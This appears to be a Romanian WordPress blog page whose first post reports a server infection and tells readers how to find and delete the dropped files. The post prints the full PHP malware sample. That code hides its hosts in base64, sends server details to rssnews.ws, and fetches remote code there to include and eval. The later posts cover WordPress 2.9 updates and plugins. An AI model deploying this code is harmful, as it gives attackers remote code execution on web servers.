Teofil Blog

Astazi am avut surpriza sa gasesc cateva fisiere php dubioase pe server la mine. Nu stiu exact cum a avut loc atacul, dar voi incerca sa il descriu.
Se pare ca acum 3 zile cineva a inceput sa scaneze pe server si unde gasea foldere chmod 777 baga cate un fisier php de forma abcdef.php, unde abcdef sunt cifre care apartin [0,9]. Nu e obligatoriu ca numele sa aiba exact 6 cifre. Codul sursa a fost destul de bine facut putandu-se lua shell pe orice server care contine macar un fisier de genul acesta. Mai exact codul php din fisier incearca sa includa un fisier de pe domeniul 7.rssnews.ws. Ce este interesant totusi la acest nou atac este ca fiecare fisier php creat are 1474 bytes. Astfel putem face o cautare pe server care sa verifice conditia ca fisierul sa aiba exact 1474 bytes si sa stergem fisierele care au numele de forma celui sus-mentionat.
Cei care au wordpress pe server vor vedea ca fisierul “media-upload.js” are aceeasi dimensiune. Totusi acesta NU are legatura cu virusul si nu trebuie sters.

Mai jos aveti si codul cu pricina. Asta pentru cei curiosi. :)

<?php
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cnNzbmV3cy53cw==");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="4b3a309cff447ae52b6c4ebe762e3796")
	$f=$_REQUEST["id"];
	if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else
	if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c);
	else {
		$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
		$o=curl_exec($cu);
		curl_close($cu);
		eval($o);
	};
	die();
?> 

N-are rost sa explicam si codul pentru a nu da idei unor oameni cu prea mult timp liber.

Cum puteti scapa de acest virus?
Puteti face o cautare direct pe server dupa dimensiunea fisierului sau cu ajutorul programului FileZilla.
Totusi, cea mai buna solutie ar fi sa puneti un shell php pentru a sterge fisierele, deoarece au fost create avand owner httpd. Adica au fost create din php si vor trebuie sterse tot de acolo.

WordPress 2.9 este alpha, iar WordPress 2.9.1 este beta. Trist, dar adevarat.
Pentru cei care vor sa nu mai aiba probleme cu WordPress 2.9 dati upgrade la WordPress 2.9.1 beta. Cu ajutorul WordPress Beta Tester puteti face lucrul asta.

Trabelsy, Lucifix: Merge preview, merg tagurile, merg toate. Have fun! [...] Continuare…

Multi se plang ca nu merge pluginul Simple Tags pe WordPress 2.9. Se pare ca autorul acelui plugin verifica versiunea si chiar daca este compatibil cu o noua versiune de wordpress tot apare mesaj de atentionare, iar pluginul este dezactivat automat.

Tot ce trebuie sa faceti este sa intrati prin FTP pe host, apoi in folderul /wp-content/plugins/simple-tags/. Aici veti gasi fisierul simple-tags.php. Ii dati editare, iar acum inlocuiti prima linie cu a doua, dupa cum vedeti mai jos.
Adica asta.

if [...] Continuare…

Update-ul s-a realizat foarte bine si nu au fost probleme in core-ul wordpress, dar pluginul Simple Tags nu mai functioneaza. Speram ca baietii sa faca un update la versiune cat mai repede.
Simple Tags can’t work with this WordPress version !

Actualizare: Acum am verificat si se pare ca au fost lansate deja versiunile compatibile cu versiunea 2.9.
Cu toate astea pluginul Simple Tags nu functioneaza cu WordPress 2.9. :| [...] Continuare…

Sa incepem cu inceputul: ce este un blog?  Un blog este un site in care continutul este generat in ordine cronologica(inversa, adica ultimul post este primul afisat pe prima pagina) si care contine ideeile si parerile personale ale autorului.

Pentru a creea un blog avem doua variante: ori platim ori un domeniu free.

Bloguri gazduite gratis de catre:
1.WordPress.com: blogul va fi de forma blog.wordpress.com (cuvantul blog poate fi inlocuit cu oricare alt nume pentru respectivul blog). Creearea unui blog [...] Continuare…

Ieri a fost lansata in sfarsit versiunea WordPress 2.9 RC(adica versiunea care “candideaza” pentru a deveni cea finala). Eu unul sunt nerabdator sa instalez aceasta versiune, deoarece chiar aveam nevoie de un editor direct in contul meu de administrare al blogului. Sau de a adauga mai usor filmuletele de pe youtube.
Mai nou intalnim si notiunea de Trash(Gunoi) care va fi un fel de Recycle Bin pentru articole si comentarii. [...] Continuare…

Spectrum este o tema pentru WordPress gratuita creata de Ignacio Ricci. Aceasta tema pare foarte luminata si plina de culoare. Puteti da, de asemenea, acestei teme un aspect personalizat schimband imaginea de fundal. Intrati >>aici<< pentru un demo al acestei teme si pentru a descarca aceasta minunata creatie.

[...] Continuare…